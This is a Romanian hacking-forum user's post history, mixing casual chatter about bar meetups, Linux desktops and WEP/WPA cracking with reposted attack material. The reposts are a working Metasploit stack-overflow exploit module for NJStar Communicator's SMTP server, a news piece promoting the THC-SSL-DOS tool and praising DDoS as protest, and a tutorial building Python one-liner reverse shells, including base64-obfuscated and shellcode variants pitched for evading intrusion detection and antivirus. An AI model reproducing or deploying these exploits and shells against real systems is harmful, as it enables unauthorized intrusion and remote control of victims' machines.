-
Posts
638 -
Joined
-
Last visited
-
Days Won
6
Everything posted by co4ie
-
nu cred ca o sa fie lume de inchiriat tot localul...cel putin curtea berarilor si caru cu bere sunt mult prea mari ! Bordellos e dragut ... dar cam scump !! In caz de recesiune mai putem incerca si terasa Argentin ... o bodega penala (inauntru) pe vremuri dar terasa e destul de ok... By the Way ... curtea berarilor vroiam si eu sa spun.... m-am incurcat !!!
-
eu propun Curtea Berarilor sau El Comandante ambele in centru vechi ... bere ieftina(6lei/halba sau bere la metru sau bere la roata:D) si dupa poate Fire club sau Club A (muzica buna , bere ieftina...) ...si weekend-ul 26-27 ca pe 19 vine animalu de sef si sigur nu scap teafar !! Scuze de Edit-uri dar le fac pe masura ce-mi amintesc .. (e cam greu cu amintirile din centrul vechi ) Edited ca am incurcat barurile
-
## # Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit # Date: 10/31/2011 # Author: Dillon Beresford # Twitter: https://twitter.com/#!/D1N # Software Link: http://www.njstar.com/download/njcom.exe # Version: 3.00 and prior # Build: 11818 and prior # Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0 # CVE : NONE # Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran, # manils, d0tslash, mublix, halsten, and everyone at AHA! ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ # ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit', 'Description' => %q{ This module exploits a stack overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Dillon Beresford', # Original discovery and MSF Module. 'Corelan Team', # tx for mona.py, all the tuts, and for being awesome. ], 'Version' => '$Revision:$', 'References' => [ [ 'OSVDB', '' ], [ 'CVE', '' ], [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ], [ 'URL', 'http://www.youtube.com/watch?v=KvkKX035484'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -1500, }, 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x7c874413, 'Offset' => 247, } # jmp esp kernel32.dll ], [ 'Windows XP SP2', { 'Ret' => 0x77558952, 'Offset' => 247, } # jmp esp ntdll.dll ], [ 'Windows XP SP1', { 'Ret' => 0x77d718fc, 'Offset' => 247, } # jmp esp user32.dll ], [ 'Windows Server 2003 SP0', { 'Ret' => 0x71c033a0, 'Offset' => 247, } # jmp esp ntdll.dll ], ], # Feel free to add more targets. 'Privileged' => false, 'DisclosureDate' => 'OCT 31 2011', 'DefaultTarget' => 0)) register_options([Opt::RPORT(25)], self.class) end def exploit eggoptions = { :checksum => true, :eggtag => "w00t" } badchars = '\x00' hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions) if target.name =~ /Windows XP SP3/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows XP SP2/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows XP SP1/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) elsif target.name =~ /Windows Server 2003 SP0/ buffer = rand_text(target['Offset']) buffer << [target.ret].pack('V') buffer << hunter buffer << make_nops(4) end # Just some debugging output so we can see lengths and byte size of each of our buffer. print_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg)) print_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter)) print_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer)) print_status("Trying target #{target.name}...") # har har har you get trick no treat... # we dont have very much space so we # send our egg in a seperate connection connect print_status("Sending the egg...") sock.put(egg) # I think you betta call, ghostbusters... # now we send our evil buffer along with the # egg hunter, we are doing multiple connections # to solve the issue with limited stack space. # thanks to bannedit for advice on threads and # making multiple connections to get around # stack space constraints. connect print_status("Sending our buffer containing the egg hunter...") sock.put(buffer) handler disconnect end end ## # No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded # on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability # is remotely exploitable and needed more verification. I sent a proof of concept exploit # in python with remote code execution. So, here is the proof that the bug is, in fact, # remotely exploitable. WIN! ## ## # eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50 # edi=008a3d80 # eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 # efl=00010206 # 42424242 ?? ??? # 0:003> !exchain # image00400000+bbc4 (0040bbc4) # 00ccff00: 41414141 # Invalid exception stack at 41414141 # 0:003> d esp # 00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # 00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # 00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # 00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A. # 00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=.. # 00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=...... # 00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................ # 00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........ ## SURSA
-
- 1
-
Merci mult !! Ma apuc la anu de cursurile comptia si o sa ajute mult !!
-
pe router-ul meu ... cracked cu 25000 IV`s ... cam 9 minute din cate-mi amintesc...
-
... ma si ofer sa iti ca functioneaza ... nu sa-ti arat doar teoria.,..
-
@ Sorelian: Uitate AICI Desi cred ca in momentul in care a spart WEP-ul era cineva pe retea...
-
Off: care vrea sa nu se rezume doar la baut ... sa-mi dea un pm ...
-
Pt cheater raspund eu pozitiv ... Deci vine ... Sa speram doar ca va fi in weekend !!
-
Prezent ... fara mine nu se poate !!
-
Merci mult !!! Chiar mi-ai salvat curu de la 3 zile de download-uri ... +1 Rep
-
Hack a server e simplu (de incercat)... Hack Network ...e cu totul altceva !!!
-
FTP b00t ... @ llegollas ... Vere scoate cacatu ala de seamnatura ca-mi strica ochii si buna dispozitie !!! (nu din cauza persoanei ci din cauza culorilor si a fetei !!! )
-
Compania de telecomunicaţii BSNL din India a fost sparta
co4ie replied to say3er.'s topic in Stiri securitate
o companie de genul face back-up zilnic la tot .. zi cand zic tot ma refer la TOT !! daca a gasit o gaura undeva (desi m-as mira,cred totusi ca a fost vb de social engineering) si a sters baza de date inseamna ca tot ce a facut e sa ii incurce vreo cateva ore pana faceau restore la tot !! Mi se pare o tampenie sa gasesti o buba intr-un colos de genul si sa iti faci de cap in loc sa anunti si poate (POATE) sa te capeti cu ceva (cash sau o vb buna) !! -
... nu stiu ce fel incercati voi sa spargeti wep de va da cu virgula... normal rezultatul ar trebui sa fie de genul 2a:2a:2a:2a:2a adica sa fie HEX ... si langa e parola "decriptata" di hex in ASCII adica ***** (in cazul asta)!! adica asa ceva !! @mirce88 ... momentan WPA numai cu dictionarul se poate sparge...un dictionar de 7gb e mic chiar si pt Romania ... incearca sa imparti in fisiere mai mici...1gb poate 2... si lasa noaptea la mestecat !! sau daca ai mai multe calculatoare imparte sarcina in 2 ...
-
THC SSL DOS Today the German hacker group "The Hacker's Choice" officially released a new DDoS tool. The tool exploits a weakness in SSL to kick a server off the Internet. Technical details can be found HERE said a member of THC who wants to remain anonymous.The tool departs from traditional DDoS tools: It does not require any bandwidth and just a single attack computer ("bot"). The THC-SSL-DOS attack is en par with other resource exhausting DDoS attacks. Some of those methods played a vital role in demonstrations against oppressive governments (like the DDoS attack against Iran's leader) and against companies that violate free speech (like the DDoS attack against Mastercard for closing Wikileak's non-profit donation account because of an alleged typo/misspelling in the application form). , says a member of THC in a private interview this morning. , Says a THC member, referring to 3 major vulnerabilities disclosed in SSL over the past 3 years.To list the 3 major vulnerabilities here THC explains: , says Fred Mauer, a senior cryptographer at THC. . . .The THC-SSL-DOS tool is a Proof Of Concept tool to disclose fishy security in SSL. It works great if the server supports SSL Renegotiation. It still works if SSL Renegotiation is not supported but requires some modifications and more bots before an effect can be seen. Our tests reveal that the average server can be taken down from a single IBM laptop through a standard DSL connection. Taking on larger server farms who make use of SSL Load balancer required 20 average size laptops and about 120kbit/sec of traffic. All in all superb results. Interesting here is that a security feature that was supposed to make SSL more secure makes it indeed more vulnerable to this attack: SSL Renegotiation was invented to renegotiate the key material of an SSL connection. This feature is rarely used. In fact we could not find any software that uses SSL Renegotiation. Yet it's enabled by default by most servers. An old saying comes true all over again: Complexity is the enemy of security. , says THC. 1. THC-SSL-DOS 2. Reverse SSL 3. DoS explained 4. E-mails SURSA
-
nu ai vazut ce am scris mai sus? sa le incerce pe amandoua si sa se decida singur... fiecare dupoa preferinte ...
-
Eu folosesc KDE ... Cel mai bine le incerci pe amandoua... cu care te intelegi mai bine cu ala lucrezi in continuare ! Comenzile difera de la unul la altul dar nu cred ca asta ar fi o problema !!
-
Ma pis pe regele mortilor si pe parlamentul viilor si pe toti copii prosti care posteaza cacaturi de stiri pe un forum de securitate !!! Baaaaa ... voi nu aveti ce pula mea face acasa? luati in pula mea si cititi o carte sau mars la pascut oile daca nu stiti sa cititi !!! nu mai umpleti forumul de cacaturi
-
Depinde de comanda pe care o dai ... la airmon-ng trebuie --channel , la airodump-ng merge -c !! Plusurile nu sunt decat daca ai backtrack 3 fara update-uri ... daca faci update la aircrack in backtrack 3 va fi acelasi cu cel din backtrack 5 ! Oricum singurile schimbari sunt update-urile la driverele de injectie de pachete , comenzile sunt aceleasi iar daca ai vreo nedumerire poti da aricrack-ng --help sau RTFM !!
-
You have remote command execution on a linux web server. Your normal tricks for getting a shell don\'t work but you know that the system has a fully functional python interpreter. In order to make your attack work you need to put the entire attack into a single command line passed to a python interpreter with the -c option. Here are a few python based one liners that can be executed with the -c option and tips for creating additional shells. Each of these examples shovel a shell to localhost. Start up a netcat listener to receive the shell ($nc -l -p 9000) before launching these sample attacks. First we start out with a simple python reverse tcp connect shell like this one. import socket import subprocess s=socket.socket() s.connect((\"127.0.0.1\",9000)) while 1: p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) s.send(p.stdout.read() + p.stderr.read()) Then we try to collapse it down to one line by separating the existing lines with semicolons. That is simple enough, but there is a problem. Python relies on spacing to indicate the start and end of a code block. The while loop doesn\'t want to collapse to a single line. But we can get it down to two lines. >>> import socket;import subprocess ;s=socket.socket() ;s.connect((\"127.0.0.1\",9000)) >>> while 1: p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE); s.send(p.stdout.read() + p.stderr.read()) If you keep the spacing straight and put those two lines into an interactive python session it works properly. As soon as you try to collapse the two lines with a semicolon you get a syntax error. The good news is you can get around that with the \"exec\" method. Python\'s exec method is similar to \"eval()\" in javascript and we can use it to interpret a script with \"\\n\" (new lines) in it to separate the lines. Using this technique we get the following one line python shell. markbaggett$ python -c \"exec(\\\"import socket, subprocess;s = socket.socket();s.connect((\'127.0.0.1\',9000))\\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\\\")\" Setup a netcat listner on your localhost listening on port 9000 and this works very nicely. If we are going to use exec(), we might as well add a little IDS evasion to the mix and obscure our code. So lets drop into interactive python and encode our payload. markbaggett$ python Python 2.5.1 (r251:54863, May 5 2011, 18:37:34) [GCC 4.0.1 (Apple Inc. build 5465)] on darwin Type \"help\", \"copyright\", \"credits\" or \"license\" for more information. >>> shellcode=\"import socket, subprocess;s = socket.socket();s.connect((\'127.0.0.1\',9000))\\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\" >>> shellcode.encode(\"base64\") \'aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgo\\nJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJl\\nY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJw\\ncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJl\\nYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkp\\n\' Next we take the base64 encoded version of our payload and exec() that with the decode() method to turn it back into our script source before execution. Our one liner becomes this: markbaggett$ python -c \"exec(\'aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgo\\nJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJl\\nY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJw\\ncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJl\\nYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkp\\n\'.decode(\'base64\'))\" Now lets apply this technique to a python shells that executes a payload from the Metasploit framework such as the one I discussed on the SANS Penetration Testing Blog. With this technique I create a python script that executes a payload from the metasploit framework. In this example I\'ll use the osx reverse tcp shell. After grabbing the stage1 bytes from \"$./msfpayload osx/x86/shell_reverse_tcp LHOST=127.0.0.1 C\" ( see SANS blog ) I built the following python script. from ctypes import * reverse_shell = \"\\x68\\x7f\\x00\\x00\\x01\\x68\\xff\\x02\\x11\\x5c\\x89\\xe7\\x31\\xc0\\x50\\x6a\\x01\\x6a\\x02\\x6a\\x10\\xb0\\x61\\xcd\\x80\\x57\\x50\\x50\\x6a\\x62\\x58\\xcd\\x80\\x50\\x6a\\x5a\\x58\\xcd\\x80\\xff\\x4f\\xe8\\x79\\xf6\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x54\\x53\\x50\\xb0\\x3b\\xcd\\x80\" memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell)) shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p)) shellcode() Spaces and carriage returns aren\'t a problem for this very simple script so with a few semicolons we get the following one liner. We don\'t need to use the \"exec()\" function since we don\'t need to interpret multiple lines. root# python -c \"from ctypes import *;reverse_shell = \\\"\\x68\\x7f\\x00\\x00\\x01\\x68\\xff\\x02\\x11\\x5c\\x89\\xe7\\x31\\xc0\\x50\\x6a\\x01\\x6a\\x02\\x6a\\x10\\xb0\\x61\\xcd\\x80\\x57\\x50\\x50\\x6a\\x62\\x58\\xcd\\x80\\x50\\x6a\\x5a\\x58\\xcd\\x80\\xff\\x4f\\xe8\\x79\\xf6\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x54\\x53\\x50\\xb0\\x3b\\xcd\\x80\\\";memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell));shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p));shellcode()\" Before pressing enter on the shell above you will need to setup the framework multi/handler to receive the incoming shell.. This time the shell is connecting back to the default port of 4444 so we set it up as follows: msf > use multi/handler msf exploit(handler) > set payload osx/x86/shell_reverse_tcp payload => osx/x86/shell_reverse_tcp msf exploit(handler) > set LHOST 127.0.0.1 LHOST => 127.0.0.1 msf exploit(handler) > exploit [*] Started reverse handler on 127.0.0.1:4444 [*] Starting the payload handler... [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54471) at 2011-10-20 09:19:03 -0400 id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff),101(com.apple.sharepoint.group.1) If you want to go back and add the exec() function to encode this payload and avoid IDS keep in mind your payload may contain ASCII representations of NULL (0x00) characters. In ASCII it is harmless, but once you encode it you may have trouble decoding it. If you want to encode that payload run your output through msfencode and use the -b option to eliminate null characters from your payload. As an aside, it is worth noting that when you compile this to an exe with pyinstaller you create a python interpreter with an ASCII representation of your script it it. Today no antivirus software detects the ascii source code of Metasploit payloads as malicious. I\'m just saying. There you go. Simple, but effective. SURSA
-
nu stiu de ce apar... toate link-urile au fost puse calumea... si am verificat de 3 ori postul inainte de a da submit...
-
Link-urile sunt puse sub forma (cu = si ghilimele bineinteles..le-am sters sa nu apara iar link): 1. (ebook ) Hacking IIS Servers [url http://www.filesonic.com/file/2302929144/%28ebook_%29_Hacking_IIS_Servers.pdf ]Download Nu stiu de ce nu merg:-/